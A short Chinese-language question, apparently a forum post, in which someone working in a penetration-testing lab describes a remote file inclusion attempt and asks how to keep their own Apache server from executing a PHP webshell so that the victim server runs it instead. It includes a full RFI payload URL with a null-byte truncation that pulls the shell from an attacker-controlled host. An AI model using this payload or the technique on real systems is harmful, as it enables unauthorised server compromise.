我在一个渗透测试实验室中使用 Kali Linux。
通过在受害者系统上输入以下 URL,我可以让它访问我的 apache 服务器(我在日志中看到 200 访问响应),但是 php 文件在我的系统上呈现,然后我在自己的盒子上生成了一个 webshell:
https://10.0.0.1/section.php?page=http://10.0.0.2/phpshell.php%00
如何在 apache 中“更改绑定”以防止其运行?将其更改为 a.txt似乎会阻止它在两个系统上运行;不确定我能不能这样注入。